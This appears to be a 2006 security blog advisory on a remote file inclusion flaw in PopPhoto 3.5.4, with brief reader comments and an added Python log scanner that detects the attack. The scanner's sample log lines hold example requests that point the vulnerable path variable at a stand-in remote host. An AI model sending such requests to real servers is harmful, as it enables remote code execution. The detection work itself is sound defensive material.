by r0t,der4444,cembo,VietMafia

Sunday, May 14, 2006

PopPhoto - Remote File Inclusion Vuln

script: PopPhoto 3.5.4 and below
risk: critical
status: unpatched
discovered by: VietMafia

Vuln. Description:

This flaw is due to an input validation error in "resources/includes/" (line 25), which does not properly validate the "cfg['popphoto_base_path']" variable. Remote attackers can include malicious scripts and execute arbitrary commands with the privileges of the web server.
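
A detection sketch for the flaw described above, added here as an example (not part of the original advisory or of PopPhoto's code): it scans web access logs for requests that supply `cfg[popphoto_base_path]` and separates off-host values from other overrides. The log lines, the `/photos/PLACEHOLDER.php` path, the hosts, the function names and the assumption that the variable arrives in the query string are all constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Variable named in the advisory; a client has no reason to send it.
PARAM = "cfg[popphoto_base_path]"
# Any "scheme://" value means the include path would point off-host.
REMOTE = re.compile(r"^\s*[a-z][a-z0-9+.-]*://", re.I)
# Client, request target and status from a combined-format log line.
REQ = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample lines; PLACEHOLDER.php stands in for the script the
# advisory does not name, and all hosts are documentation addresses.
SAMPLE_LOG = """\
198.51.100.7 - - [14/May/2006:10:01:02 +0000] "GET /photos/index.php?page=2 HTTP/1.1" 200 5120
203.0.113.9 - - [14/May/2006:10:03:44 +0000] "GET /photos/PLACEHOLDER.php?cfg[popphoto_base_path]=http://example.invalid/x.txt HTTP/1.1" 200 312
203.0.113.9 - - [14/May/2006:10:03:51 +0000] "GET /photos/PLACEHOLDER.php?cfg%5Bpopphoto_base_path%5D=FTP://example.invalid/x HTTP/1.0" 404 210
192.0.2.33 - - [14/May/2006:10:09:10 +0000] "GET /photos/PLACEHOLDER.php?cfg[popphoto_base_path]=/var/www/photos/ HTTP/1.1" 200 4096
"""

def classify(line):
    """Return (client, status, verdict) if the line sets PARAM, else None."""
    m = REQ.match(line)
    if not m:
        return None
    client, target, status = m.group(1), m.group(2), int(m.group(3))
    query = target.partition("?")[2]
    # parse_qsl percent-decodes keys and values, so %5B/%5D forms match too.
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key.strip().lower() == PARAM:
            verdict = "remote-include" if REMOTE.match(value) else "param-override"
            return client, status, verdict
    return None

def scan(log_text):
    """Collect findings for every parsable line of a log excerpt."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]

if __name__ == "__main__":
    for client, status, verdict in scan(SAMPLE_LOG):
        # A 2xx status means the script ran with the supplied value: triage first.
        print(f"{verdict:15} {client:15} status={status}")
```

Access logs record only the request line, so values sent in a POST body or cookie are outside what this check can see.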



Sorry all, I'm still travelling so I don't have much time to contribute :) I will be back very soon.


Blogger r0t told...

No probz bro, I'm also still enjoying my holidays...

4:32 AM

Anonymous alfanso told...

PoC isn't working..........:O

8:56 AM

Blogger VietMafia told...

lol, you have to use the PoC wisely mate

4:02 PM


Copyright (c) 2006 Pridels Sec Crew